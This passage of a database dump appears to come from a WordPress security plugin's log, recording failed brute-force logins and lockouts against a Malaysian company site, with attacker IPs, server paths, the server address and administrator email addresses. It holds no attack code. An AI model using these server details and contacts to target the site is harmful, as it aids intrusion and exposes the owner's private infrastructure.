attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:43:18\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:43:18\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:58:18\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:58:18\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:43:20','2019-09-21 11:43:18',17882184,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'66.70.160.187'),(25726,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:43:20','2019-09-21 11:43:18',18087928,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'66.70.160.187'),(25727,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYM2bfBTP0kPOVnb8jqtwAAAEw\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"66.70.160.187\";s:11:\"REMOTE_PORT\";s:5:\"38204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYM2bfBTP0kPOVnb8jqtwAAAEw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066201.4751\";s:12:\"REQUEST_TIME\";s:10:\"1569066201\";}}','notice','2019-09-21 11:43:23','2019-09-21 11:43:21',18315568,19612904,'https://bintara.com.my/wp/xmlrpc.php',1,0,'66.70.160.187'),(25728,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYM3nkXpgmG5P@iB8kbmQAAAIs\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"206.189.155.76\";s:11:\"REMOTE_PORT\";s:5:\"39888\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYM3nkXpgmG5P@iB8kbmQAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066206.5061\";s:12:\"REQUEST_TIME\";s:10:\"1569066206\";}}','notice','2019-09-21 11:43:27','2019-09-21 11:43:26',17799128,19290208,'https://bintara.com.my/2019/wp-login.php',1,0,'206.189.155.76'),(24849,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"67.198.130.240\";s:11:\"REMOTE_PORT\";s:5:\"40934\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGTnm4SfF9g@8lNlxwrOQAAAEY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568773022.8701\";s:12:\"REQUEST_TIME\";s:10:\"1568773022\";}}','notice','2019-09-18 02:17:04','2019-09-18 02:17:03',18253152,19551264,'https://bintara.com.my/xmlrpc.php',1,0,'67.198.130.240'),(23670,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.111.24.122\";s:11:\"REMOTE_PORT\";s:5:\"37758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXI-n7Jd0PTN0Z-ZCa6mbQAAAEc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567768480.1003\";s:12:\"REQUEST_TIME\";s:10:\"1567768480\";}}','notice','2019-09-06 11:14:44','2019-09-06 11:14:40',17739648,19229328,'https://bintara.com.my/wp-login.php',1,0,'89.111.24.122'),(24850,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.229.84.90\";s:11:\"REMOTE_PORT\";s:5:\"37824\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGVIa1FqYKvioG46Y4LDgAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568773409.8006\";s:12:\"REQUEST_TIME\";s:10:\"1568773409\";}}','notice','2019-09-18 02:23:31','2019-09-18 02:23:30',17737544,19228568,'https://bintara.com.my/wp-login.php',1,0,'23.229.84.90'),(23671,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.111.24.122\";s:11:\"REMOTE_PORT\";s:5:\"38446\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXI-pbJd0PTN0Z-ZCa6mdAAAAFE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567768486.6959\";s:12:\"REQUEST_TIME\";s:10:\"1567768486\";}}','notice','2019-09-06 11:14:50','2019-09-06 11:14:47',18257768,19557480,'https://bintara.com.my/xmlrpc.php',1,0,'89.111.24.122'),(23672,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"35.237.101.161\";s:11:\"REMOTE_PORT\";s:5:\"58542\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXKK21hVG6qvFCxHIFqNcAAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567787739.9791\";s:12:\"REQUEST_TIME\";s:10:\"1567787739\";}}','notice','2019-09-06 16:35:41','2019-09-06 16:35:40',17743992,19235552,'https://bintara.com.my/wp-login.php',1,0,'35.237.101.161'),(23673,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"35.237.101.161\";s:11:\"REMOTE_PORT\";s:5:\"58806\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXKK38vQn4pjNANs3gfp3AAAAUw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567787743.5053\";s:12:\"REQUEST_TIME\";s:10:\"1567787743\";}}','notice','2019-09-06 16:35:46','2019-09-06 16:35:43',18257352,19555272,'https://bintara.com.my/xmlrpc.php',1,0,'35.237.101.161'),(23674,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\